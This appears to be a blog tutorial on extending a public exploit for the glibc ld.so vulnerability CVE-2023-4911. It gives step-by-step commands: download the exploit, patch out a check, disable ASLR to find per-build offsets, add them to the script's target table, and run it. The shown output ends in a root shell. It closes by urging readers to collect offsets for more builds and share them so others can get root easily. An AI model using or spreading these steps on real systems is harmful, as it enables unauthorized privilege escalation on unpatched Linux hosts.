Finding Offsets for bl4sty's CVE-2023-4911 Exploit.

bl4sty released a fantastically extendable exploit for the CVE-2023-4911 vulnerability.

The exploit code is nice and easy to understand, but after someone asked, I figured it was worth actually documenting how you add offsets/targets to the exploit.

Firstly, download the exploit script onto your target system.

$ wget https://haxx.in/files/gnu-acme.py

Next, we need to slightly edit the script to remove an error check, so that it will run without a "supported" target. See the diff output below. (Update: this patch is no longer required since bl4sty made an update to the exploit - it now detects if ASLR is disabled and goes right to target finding mode instead of requiring the patch).

$ diff gnu-acme.py.orig gnu-acme.py
275,276c275,276
<     if ld_build_id not in TARGETS.keys():
<         error("no target info found for build id %s" % ld_build_id)
---
> #    if ld_build_id not in TARGETS.keys():
> #        error("no target info found for build id %s" % ld_build_id)

Now, switch user to root, and disable ASLR, before switching back to your unprivileged user account with su (so as to launch a new shell without ASLR).

$ sudo su - root 
# echo 0 > /proc/sys/kernel/randomize_va_space
# su - user
$  

Once you have done this, you should be able to simply run the exploit – if ASLR is disabled, it will run in "offset finding" mode, and emit a load of output. Pipe this with tee to a file. Wait until it completes.

$ python3 gnu-acme.py | tee -a offset_finder.log
<output snipped>

Once its done printing stuff, grep for the string "found working offset" in the logfile.

$ grep "found working offset" offset_finder.log 
found working offset for ld.so '61ef896a699bb1c2e4e231642b2e1688b2f1a61e' -> 548 
<snipped>
found working offset for ld.so '61ef896a699bb1c2e4e231642b2e1688b2f1a61e' -> 620

Pick whichever offset you like the look of from this output. Take a look at the "targets" dictionary in the exploit. It looks like this:

TARGETS = {
    "a8daca28288575ffc8c7641d40901b0148958fb1": 580,
    "a99db3715218b641780b04323e4ae5953d68a927": 561,
}

It should be fairly obvious how to add your target. You should end up with something like the following:

TARGETS = {
    "a8daca28288575ffc8c7641d40901b0148958fb1": 580,
    "a99db3715218b641780b04323e4ae5953d68a927": 561,
    "61ef896a699bb1c2e4e231642b2e1688b2f1a61e": 548,
}

Now, drop out of your shell, re-enable ASLR, and go back to your original session.

$ exit
logout
# echo 1 > /proc/sys/kernel/randomize_va_space
# exit
logout
$

You can now run the exploit, and all things going well, land a root shell in some amount of time.

$ python3 gnu-acme.py 

      $$$ glibc ld.so (CVE-2023-4911) exploit $$$
            -- by blasty <peter@haxx.in> --      

[i] libc = /lib/x86_64-linux-gnu/libc.so.6
[i] su = /usr/bin/su
[i] ld.so = /lib64/ld-linux-x86-64.so.2
[i] ld.so build id = 61ef896a699bb1c2e4e231642b2e1688b2f1a61e
[i] __libc_start_main = 0x29dc0
[i] using hax path b'"' at offset -20
[i] wrote patched libc.so.6
[i] using stack addr 0x7ffe10101003
................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
.....................................................................................................................................# ** ohh... looks like we got a shell? **

id
uid=0(root) gid=1001(user) groups=1001(user),27(sudo)
# 

You may find some offsets work better than others, apparently? I noticed some are faster to pop shells than others on that test VM, but I am not terribly sure that my sample size is statistically significant. Further science is needed.

So, you have your homework. Go forth, and harvest offset lists for the different build ID's out there and share them with your friends so they can pop root shells with ease.

Most importantly, have fun.